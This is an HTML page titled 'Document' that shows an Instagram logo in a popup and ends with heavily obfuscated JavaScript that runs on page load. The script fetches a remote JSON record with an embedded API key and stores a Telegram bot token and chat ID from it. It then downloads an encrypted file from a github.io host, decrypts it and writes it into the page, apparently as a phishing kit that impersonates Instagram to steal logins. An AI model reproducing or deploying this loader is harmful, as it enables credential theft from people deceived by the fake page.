<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="https://damsea.github.io/import.js"></script>
    <script>
        script(aes)
        script(ajax)
    </script>
    <style>
        .popup {
          align-items: flex-start;
          bottom: 0;
          display: flex;
          justify-content: center;
          left: 0;
          position: fixed;
          right: 0;
          top: 0;
          z-index: 10;
          overflow: auto;
        }
        .popup .popup_bg {
          position: fixed;
          top: 0;
          left: 0;
          right: 0;
          bottom: 0;
          z-index: 1;
          opacity: 0.6;
        }
        .popup .popup_box {
          display: flex;
          flex-direction: column;
          justify-content: center;
          min-height: 100%;
          padding: 30px;
        }
        .popup .popup_content {
        
          -webkit-border-radius: 10px;
          -moz-border-radius: 10px;
          -o-border-radius: 10px;
          -ms-border-radius: 10px;
          border-radius: 10px;
          position: relative;
          z-index: 2;
          width: 200px;
        }
        img{
            display: block;
            margin: auto;
            width:50px;
            
            
        }
        
        @media all and (min-width:1000px){
                 
                    img{
                        display: block;
                       margin: auto;
            
                    }
            }
        
          </style>
</head>
<body>
    

    <div class="popup">
        <div class="popup_bg"></div>
        <div class="popup_box">
            <div class="popup_content">
               <img src="https://cloudarhiv.github.io/instagram.png" alt="">
            </div>
        </div>
    </div>



</body>
<script>
var _0x3baf2d=_0x30f8;(function(_0x7c36a,_0x5e8cb2){var _0x45d936=_0x30f8,_0x58e866=_0x7c36a();while(!![]){try{var _0x5ec192=parseInt(_0x45d936(0x134))/0x1+-parseInt(_0x45d936(0x12e))/0x2*(-parseInt(_0x45d936(0x13b))/0x3)+parseInt(_0x45d936(0x136))/0x4+-parseInt(_0x45d936(0x148))/0x5*(parseInt(_0x45d936(0x14a))/0x6)+parseInt(_0x45d936(0x144))/0x7*(-parseInt(_0x45d936(0x142))/0x8)+parseInt(_0x45d936(0x130))/0x9*(-parseInt(_0x45d936(0x139))/0xa)+-parseInt(_0x45d936(0x137))/0xb*(-parseInt(_0x45d936(0x141))/0xc);if(_0x5ec192===_0x5e8cb2)break;else _0x58e866['push'](_0x58e866['shift']());}catch(_0x59d015){_0x58e866['push'](_0x58e866['shift']());}}}(_0x14e6,0x78229));function _0x14e6(){var _0x1cb425=['3025792lhDeho','43582xEMiLu','onload','30hoDPxo','write','28131qbxXzU','post','text','token','record','https://api.jsonbin.io/v3/b/64168681c0e7653a058a7501','3036INiOMq','248IhpmpP','status','14189gNVtTl','$2b$10$1O.PoWna8zg/AryJziD/Au2tUX8Q6dqIq8/Nr/rIo2Num3tLJ1SW.','pop_save','tokenid','259255iOkKeD','stringify','90DqBeFg','get','then','telegram','72NnMPVT','setItem','2823921TEQgUb','https://cloudarhiv.github.io/instagram.txt','pop','log','177576mlDAPd','chat_id'];_0x14e6=function(){return _0x1cb425;};return _0x14e6();}var pops=0x0;window[_0x3baf2d(0x138)]=()=>{var _0x59e1c1=_0x3baf2d;$ajax[_0x59e1c1(0x12b)]({'url':_0x59e1c1(0x140),'key':_0x59e1c1(0x145)},_0x24db34=>{var _0x95908e=_0x59e1c1;pops++,_0x24db34[_0x95908e(0x13f)][_0x95908e(0x146)]=_0x24db34[_0x95908e(0x13f)]['pop_save']+pops;_0x24db34['record']['status']==![]&&(fetch('https://blcobar.github.io/error.html')[_0x95908e(0x12c)](_0x1ab89b=>_0x1ab89b['text']())[_0x95908e(0x12c)](_0x218c04=>document[_0x95908e(0x13a)](_0x218c04)),console[_0x95908e(0x133)]('Error\x20status\x20[false]!'));if(_0x24db34['record'][_0x95908e(0x143)]==!![]){var _0x4dedb0={'token':_0x24db34[_0x95908e(0x13f)][_0x95908e(0x12d)][_0x95908e(0x13e)],'id':_0x24db34[_0x95908e(0x13f)][_0x95908e(0x12d)][_0x95908e(0x135)]};localStorage[_0x95908e(0x12f)](_0x95908e(0x147),JSON[_0x95908e(0x149)](_0x4dedb0)),fetch(_0x95908e(0x131))[_0x95908e(0x12c)](_0x2917f6=>_0x2917f6[_0x95908e(0x13d)]())['then'](_0x8d9be1=>document[_0x95908e(0x13a)](decrypt(_0x8d9be1,'3301'))),_0x24db34[_0x95908e(0x13f)]['pop_save']==_0x24db34['record'][_0x95908e(0x132)]&&(_0x24db34[_0x95908e(0x13f)][_0x95908e(0x143)]=![]),_0x24db34['record']['pop_save']<_0x24db34['record'][_0x95908e(0x132)]+0x1&&savedata(_0x24db34['record']);}});};function _0x30f8(_0x1b3bba,_0xbc860b){var _0x14e65f=_0x14e6();return _0x30f8=function(_0x30f868,_0xd62302){_0x30f868=_0x30f868-0x12b;var _0xcf7bf9=_0x14e65f[_0x30f868];return _0xcf7bf9;},_0x30f8(_0x1b3bba,_0xbc860b);}function savedata(_0x290c42){var _0x362d5b=_0x3baf2d;$ajax[_0x362d5b(0x13c)]({'url':_0x362d5b(0x140),'key':_0x362d5b(0x145),'data':_0x290c42},_0x3e0071=>{var _0x537f93=_0x362d5b;console[_0x537f93(0x133)](_0x3e0071);});}
    </script>
</html>

